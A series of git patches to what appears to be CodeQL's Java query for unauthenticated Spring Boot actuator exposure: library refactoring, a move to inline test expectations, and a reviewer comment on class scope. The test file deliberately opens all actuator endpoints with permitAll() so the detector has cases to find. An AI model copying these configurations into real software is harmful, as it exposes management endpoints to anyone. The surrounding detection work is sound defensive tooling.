*/ -class TypeEndpointRequest extends Class { - TypeEndpointRequest() { - this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", - "EndpointRequest") - } -} - -/** A call to `EndpointRequest.toAnyEndpoint` method. */ -class ToAnyEndpointCall extends MethodCall { - ToAnyEndpointCall() { - this.getMethod().hasName("toAnyEndpoint") and - this.getMethod().getDeclaringType() instanceof TypeEndpointRequest - } -} - -/** - * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. 
- */ -class RequestMatcherCall extends MethodCall { - RequestMatcherCall() { - this.getMethod().hasName("requestMatcher") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0) instanceof ToAnyEndpointCall - } -} - -/** - * A call to `HttpSecurity.requestMatchers` method with lambda argument - * `RequestMatcher.toAnyEndpoint()`. - */ -class RequestMatchersCall extends MethodCall { - RequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and - this.getArgument(0).(LambdaExpr).getExprBody() instanceof ToAnyEndpointCall - } -} - -/** A call to `HttpSecurity.authorizeRequests` method. */ -class AuthorizeRequestsCall extends MethodCall { - AuthorizeRequestsCall() { - this.getMethod().hasName("authorizeRequests") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity - } -} - -/** A call to `AuthorizedUrl.permitAll` method. */ -class PermitAllCall extends MethodCall { - PermitAllCall() { - this.getMethod().hasName("permitAll") and - this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl - } - - /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ - predicate permitsSpringBootActuators() { - exists(AuthorizeRequestsCall authorizeRequestsCall | - // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall - or - // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] 
- authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall - | - // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - ( - this.getQualifier() instanceof AnyRequestCall or - this.getQualifier() instanceof RegistryRequestMatchersCall - ) - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - or - exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = anyRequestCall - ) - ) - or - exists(AuthorizeRequestsCall authorizeRequestsCall | - // http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess - | - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - this.getQualifier() instanceof RegistryRequestMatchersCall - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - ) - } -} - -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. 
*/ -class AnyRequestCall extends MethodCall { - AnyRequestCall() { - this.getMethod().hasName("anyRequest") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry - } -} - -/** - * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument - * `RequestMatcher.toAnyEndpoint()`. - */ -class RegistryRequestMatchersCall extends MethodCall { - RegistryRequestMatchersCall() { - this.getMethod().hasName("requestMatchers") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and - this.getAnArgument() instanceof ToAnyEndpointCall - } -} diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected deleted file mode 100644 index f2874e3694d1..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.expected +++ /dev/null @@ -1,7 +0,0 @@ -| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | 
diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java deleted file mode 100644 index da59919fbe6c..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.java +++ /dev/null 
@@ -1,104 +0,0 @@ -import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; -import org.springframework.security.config.annotation.web.builders.HttpSecurity; - -public class SpringBootActuators { - protected void configure(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); - } - - protected void configure2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); - } - - protected void configure5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); - } - - protected void configure6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); - } - - protected void configure7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOk1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOk2(HttpSecurity http) throws Exception { - http.requestMatchers().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOk3(HttpSecurity http) throws Exception { - http.authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOk4(HttpSecurity 
http) throws Exception { - http.authorizeRequests(authz -> authz.anyRequest().permitAll()); - } - - protected void configureOkSafeEndpoints1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests(requests -> requests.anyRequest().permitAll()); - } - - protected void configureOkSafeEndpoints2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health")).authorizeRequests().requestMatchers(EndpointRequest.to("health")).permitAll(); - } - - protected void configureOkSafeEndpoints3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); - } - - protected void configureOkSafeEndpoints4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOkSafeEndpoints5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.to("health", "info")).permitAll(); - } - - protected void configureOkSafeEndpoints6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.to("health", "info")).permitAll()); - } - - protected void configureOkSafeEndpoints7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.to("health", "info")).authorizeRequests().anyRequest().permitAll(); - } - - protected void configureOkNoPermitAll1(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest()); - } - - protected void configureOkNoPermitAll2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void 
configureOkNoPermitAll3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); - } - - protected void configureOkNoPermitAll5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()); - } - - protected void configureOkNoPermitAll6(HttpSecurity http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint())); - } - - protected void configureOkNoPermitAll7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest(); - } -} diff --git a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref deleted file mode 100644 index ec49ecd718c2..000000000000 --- a/java/ql/test/experimental/query-tests/security/CWE-016/SpringBootActuators.qlref +++ /dev/null @@ -1 +0,0 @@ -experimental/Security/CWE/CWE-016/SpringBootActuators.ql From 8064e8f1f9f9771784bb2a12b9cbc5d466fa4a64 Mon Sep 17 00:00:00 2001 
From: Jami Cogswell Date: Wed, 19 Feb 2025 19:03:02 -0500 Subject: [PATCH 015/892] Java: convert tests to inline expectations --- .../security/SpringBootActuatorsQuery.qll} | 2 ++ .../CWE/CWE-016/SpringBootActuators.ql | 2 +- .../CWE-016/SpringBootActuators.expected | 7 ------- .../security/CWE-016/SpringBootActuators.qlref | 1 - .../CWE-016/SpringBootActuatorsTest.expected | 0 ...ators.java => SpringBootActuatorsTest.java} | 16 ++++++++-------- .../CWE-016/SpringBootActuatorsTest.ql | 18 ++++++++++++++++++ 7 files changed, 29 insertions(+), 17 deletions(-) rename java/ql/{src/Security/CWE/CWE-016/SpringBootActuators.qll => lib/semmle/code/java/security/SpringBootActuatorsQuery.qll} (98%) delete mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected delete mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected rename java/ql/test/query-tests/security/CWE-016/{SpringBootActuators.java => SpringBootActuatorsTest.java} (89%) create mode 100644 java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll similarity index 98% rename from java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll rename to java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index 195de7a1b8be..9aac9e4fc1a2 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll @@ -1,3 +1,5 @@ +/** Provides classes and predicates to reason about exposed actuators in Spring Boot. */ + import java /** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ 
diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql index b700e691550f..c74c34284233 100644 --- a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql @@ -12,7 +12,7 @@ */ import java -import SpringBootActuators +import semmle.code.java.security.SpringBootActuatorsQuery from PermitAllCall permitAllCall where permitAllCall.permitsSpringBootActuators() diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected deleted file mode 100644 index f2874e3694d1..000000000000 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.expected +++ /dev/null @@ -1,7 +0,0 @@ -| SpringBootActuators.java:6:88:6:120 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:10:5:10:137 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:14:5:14:149 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:18:5:18:101 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:22:5:22:89 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:26:40:26:108 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | -| SpringBootActuators.java:30:5:30:113 | permitAll(...) | Unauthenticated access to Spring Boot actuator is allowed. | diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref b/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref deleted file mode 100644 index abd5f2a75991..000000000000 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.qlref +++ /dev/null 
@@ -1 +0,0 @@ -Security/CWE/CWE-016/SpringBootActuators.ql diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.expected new file mode 100644 index 000000000000..e69de29bb2d1 diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java similarity index 89% rename from java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java rename to java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java index da59919fbe6c..71856f5c1a92 100644 --- a/java/ql/test/query-tests/security/CWE-016/SpringBootActuators.java +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.java 
@@ -1,33 +1,33 @@ import org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest; import org.springframework.security.config.annotation.web.builders.HttpSecurity; -public class SpringBootActuators { +public class SpringBootActuatorsTest { protected void configure(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests(requests -> requests.anyRequest().permitAll()); // $ hasExposedSpringBootActuator } protected void configure2(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator } protected void configure3(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator } protected void configure4(HttpSecurity http) throws Exception { - http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + http.requestMatcher(EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator } protected void configure5(HttpSecurity http) throws Exception { - http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); + http.authorizeRequests().requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll(); // $ hasExposedSpringBootActuator } protected void configure6(HttpSecurity 
http) throws Exception { - http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); + http.authorizeRequests(requests -> requests.requestMatchers(EndpointRequest.toAnyEndpoint()).permitAll()); // $ hasExposedSpringBootActuator } protected void configure7(HttpSecurity http) throws Exception { - http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); + http.requestMatchers(matcher -> EndpointRequest.toAnyEndpoint()).authorizeRequests().anyRequest().permitAll(); // $ hasExposedSpringBootActuator } protected void configureOk1(HttpSecurity http) throws Exception { diff --git a/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql new file mode 100644 index 000000000000..f397fdb79aab --- /dev/null +++ b/java/ql/test/query-tests/security/CWE-016/SpringBootActuatorsTest.ql @@ -0,0 +1,18 @@ +import java +import semmle.code.java.security.SpringBootActuatorsQuery +import utils.test.InlineExpectationsTest + +module SpringBootActuatorsTest implements TestSig { + string getARelevantTag() { result = "hasExposedSpringBootActuator" } + + predicate hasActualResult(Location location, string element, string tag, string value) { + tag = "hasExposedSpringBootActuator" and + exists(PermitAllCall permitAllCall | permitAllCall.permitsSpringBootActuators() | + permitAllCall.getLocation() = location and + element = permitAllCall.toString() and + value = "" + ) + } +} + +import MakeTest From 8dfb920e051c3573fe0ca52c429408985bbaa6a3 Mon Sep 17 00:00:00 2001 
From: Jami Cogswell Date: Thu, 20 Feb 2025 16:26:46 -0500 Subject: [PATCH 016/892] Java: refactor QL, move code to libraries --- .../java/frameworks/spring/SpringBoot.qll | 24 +++ .../java/frameworks/spring/SpringSecurity.qll | 59 ++++++ .../security/SpringBootActuatorsQuery.qll | 178 ++++++------------ .../CWE/CWE-016/SpringBootActuators.ql | 3 +- .../CWE-016/SpringBootActuatorsTest.ql | 3 +- 5 files changed, 142 insertions(+), 125 deletions(-) create mode 100644 java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll create mode 100644 java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll new file mode 100644 index 000000000000..864fc4bfcaff --- /dev/null +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringBoot.qll @@ -0,0 +1,24 @@ +/** + * Provides classes for working with Spring classes and interfaces from + * `org.springframework.boot.*`. + */ + +import java + +/** + * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. + */ +class TypeEndpointRequest extends Class { + TypeEndpointRequest() { + this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", + "EndpointRequest") + } +} + +/** A call to `EndpointRequest.toAnyEndpoint` method. */ +class ToAnyEndpointCall extends MethodCall { + ToAnyEndpointCall() { + this.getMethod().hasName("toAnyEndpoint") and + this.getMethod().getDeclaringType() instanceof TypeEndpointRequest + } +} diff --git a/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll new file mode 100644 index 000000000000..3f11cc8d3ec8 --- /dev/null +++ b/java/ql/lib/semmle/code/java/frameworks/spring/SpringSecurity.qll 
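Review bot: The QLDoc on `ToAnyEndpointCall` in the new `SpringBoot.qll` should state its scope, because the class is now shared library API and matches only a direct `toAnyEndpoint()` call on the servlet `EndpointRequest`. The consumers visible in this series test an argument with `instanceof ToAnyEndpointCall`, so a chained form such as `toAnyEndpoint().excluding(...)`, where the argument expression is the outer call, would presumably not match and the exposure query would stay silent. I would extend the comment on `ToAnyEndpointCall` to say that calls chained on its result are not instances of the class, and add a line to the `TypeEndpointRequest` comment saying that the reactive `EndpointRequest` is not modelled.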
@@ -0,0 +1,59 @@ +/** + * Provides classes for working with Spring classes and interfaces from + * `org.springframework.security.*`. + */ + +import java + +/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ +class TypeHttpSecurity extends Class { + TypeHttpSecurity() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", + "HttpSecurity") + } +} + +/** + * The class + * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. + */ +class TypeAuthorizedUrl extends Class { + TypeAuthorizedUrl() { + this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", + "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") + } +} + +/** + * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. + */ +class TypeAbstractRequestMatcherRegistry extends Class { + TypeAbstractRequestMatcherRegistry() { + this.hasQualifiedName("org.springframework.security.config.annotation.web", + "AbstractRequestMatcherRegistry>") + } +} + +/** A call to `HttpSecurity.authorizeRequests` method. */ +class AuthorizeRequestsCall extends MethodCall { + AuthorizeRequestsCall() { + this.getMethod().hasName("authorizeRequests") and + this.getMethod().getDeclaringType() instanceof TypeHttpSecurity + } +} + +/** A call to `AuthorizedUrl.permitAll` method. */ +class PermitAllCall extends MethodCall { + PermitAllCall() { + this.getMethod().hasName("permitAll") and + this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl + } +} + +/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ +class AnyRequestCall extends MethodCall { + AnyRequestCall() { + this.getMethod().hasName("anyRequest") and + this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry + } +} 
diff --git a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll index 9aac9e4fc1a2..6ccfa39f3d63 100644 --- a/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll +++ b/java/ql/lib/semmle/code/java/security/SpringBootActuatorsQuery.qll 
@@ -1,58 +1,14 @@ /** Provides classes and predicates to reason about exposed actuators in Spring Boot. */ import java - -/** The class `org.springframework.security.config.annotation.web.builders.HttpSecurity`. */ -class TypeHttpSecurity extends Class { - TypeHttpSecurity() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.builders", - "HttpSecurity") - } -} - -/** - * The class - * `org.springframework.security.config.annotation.web.configurers.ExpressionUrlAuthorizationConfigurer`. - */ -class TypeAuthorizedUrl extends Class { - TypeAuthorizedUrl() { - this.hasQualifiedName("org.springframework.security.config.annotation.web.configurers", - "ExpressionUrlAuthorizationConfigurer$AuthorizedUrl<>") - } -} +private import semmle.code.java.frameworks.spring.SpringSecurity +private import semmle.code.java.frameworks.spring.SpringBoot /** - * The class `org.springframework.security.config.annotation.web.AbstractRequestMatcherRegistry`. - */ -class TypeAbstractRequestMatcherRegistry extends Class { - TypeAbstractRequestMatcherRegistry() { - this.hasQualifiedName("org.springframework.security.config.annotation.web", - "AbstractRequestMatcherRegistry>") - } -} - -/** - * The class `org.springframework.boot.actuate.autoconfigure.security.servlet.EndpointRequest`. - */ -class TypeEndpointRequest extends Class { - TypeEndpointRequest() { - this.hasQualifiedName("org.springframework.boot.actuate.autoconfigure.security.servlet", - "EndpointRequest") - } -} - -/** A call to `EndpointRequest.toAnyEndpoint` method. */ -class ToAnyEndpointCall extends MethodCall { - ToAnyEndpointCall() { - this.getMethod().hasName("toAnyEndpoint") and - this.getMethod().getDeclaringType() instanceof TypeEndpointRequest - } -} - -/** - * A call to `HttpSecurity.requestMatcher` method with argument `RequestMatcher.toAnyEndpoint()`. + * A call to `HttpSecurity.requestMatcher` method with argument + * `RequestMatcher.toAnyEndpoint()`. 
*/ -class RequestMatcherCall extends MethodCall { +private class RequestMatcherCall extends MethodCall { RequestMatcherCall() { this.getMethod().hasName("requestMatcher") and this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and @@ -64,7 +20,7 @@ class RequestMatcherCall extends MethodCall { * A call to `HttpSecurity.requestMatchers` method with lambda argument * `RequestMatcher.toAnyEndpoint()`. */ -class RequestMatchersCall extends MethodCall { +private class RequestMatchersCall extends MethodCall { RequestMatchersCall() { this.getMethod().hasName("requestMatchers") and this.getMethod().getDeclaringType() instanceof TypeHttpSecurity and 
@@ -72,86 +28,62 @@ class RequestMatchersCall extends MethodCall { } } -/** A call to `HttpSecurity.authorizeRequests` method. */ -class AuthorizeRequestsCall extends MethodCall { - AuthorizeRequestsCall() { - this.getMethod().hasName("authorizeRequests") and - this.getMethod().getDeclaringType() instanceof TypeHttpSecurity - } -} - -/** A call to `AuthorizedUrl.permitAll` method. */ -class PermitAllCall extends MethodCall { - PermitAllCall() { - this.getMethod().hasName("permitAll") and - this.getMethod().getDeclaringType() instanceof TypeAuthorizedUrl - } - - /** Holds if `permitAll` is called on request(s) mapped to actuator endpoint(s). */ - predicate permitsSpringBootActuators() { - exists(AuthorizeRequestsCall authorizeRequestsCall | - // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall - or - // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall - | - // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - ( - this.getQualifier() instanceof AnyRequestCall or - this.getQualifier() instanceof RegistryRequestMatchersCall - ) - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - // [...].authorizeRequests().anyRequest().permitAll() - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - or - exists(AnyRequestCall anyRequestCall | - anyRequestCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = anyRequestCall - ) - ) - or - exists(AuthorizeRequestsCall authorizeRequestsCall | - // 
http.authorizeRequests([...]).[...] - authorizeRequestsCall.getQualifier() instanceof VarAccess - | - // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) - authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = this and - this.getQualifier() instanceof RegistryRequestMatchersCall - or - // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or - authorizeRequestsCall.getNumArgument() = 0 and - exists(RegistryRequestMatchersCall registryRequestMatchersCall | - registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and - this.getQualifier() = registryRequestMatchersCall - ) - ) - } -} - -/** A call to `AbstractRequestMatcherRegistry.anyRequest` method. */ -class AnyRequestCall extends MethodCall { - AnyRequestCall() { - this.getMethod().hasName("anyRequest") and - this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry - } -} - /** * A call to `AbstractRequestMatcherRegistry.requestMatchers` method with an argument * `RequestMatcher.toAnyEndpoint()`. */ -class RegistryRequestMatchersCall extends MethodCall { +private class RegistryRequestMatchersCall extends MethodCall { RegistryRequestMatchersCall() { this.getMethod().hasName("requestMatchers") and this.getMethod().getDeclaringType() instanceof TypeAbstractRequestMatcherRegistry and this.getAnArgument() instanceof ToAnyEndpointCall } } + +/** Holds if `permitAllCall` is called on request(s) mapped to actuator endpoint(s). */ +predicate permitsSpringBootActuators(PermitAllCall permitAllCall) { + exists(AuthorizeRequestsCall authorizeRequestsCall | + // .requestMatcher(EndpointRequest).authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof RequestMatcherCall + or + // .requestMatchers(matcher -> EndpointRequest).authorizeRequests([...]).[...] 
+ authorizeRequestsCall.getQualifier() instanceof RequestMatchersCall + | + // [...].authorizeRequests(r -> r.anyRequest().permitAll()) or + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + ( + permitAllCall.getQualifier() instanceof AnyRequestCall or + permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall + ) + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + // [...].authorizeRequests().anyRequest().permitAll() + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + permitAllCall.getQualifier() = registryRequestMatchersCall + ) + or + exists(AnyRequestCall anyRequestCall | + anyRequestCall.getQualifier() = authorizeRequestsCall and + permitAllCall.getQualifier() = anyRequestCall + ) + ) + or + exists(AuthorizeRequestsCall authorizeRequestsCall | + // http.authorizeRequests([...]).[...] + authorizeRequestsCall.getQualifier() instanceof VarAccess + | + // [...].authorizeRequests(r -> r.requestMatchers(EndpointRequest).permitAll()) + authorizeRequestsCall.getArgument(0).(LambdaExpr).getExprBody() = permitAllCall and + permitAllCall.getQualifier() instanceof RegistryRequestMatchersCall + or + // [...].authorizeRequests().requestMatchers(EndpointRequest).permitAll() or + authorizeRequestsCall.getNumArgument() = 0 and + exists(RegistryRequestMatchersCall registryRequestMatchersCall | + registryRequestMatchersCall.getQualifier() = authorizeRequestsCall and + permitAllCall.getQualifier() = registryRequestMatchersCall + ) + ) +} diff --git a/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/Security/CWE/CWE-016/SpringBootActuators.ql index c74c34284233..bac0a72e1441 100644 --- 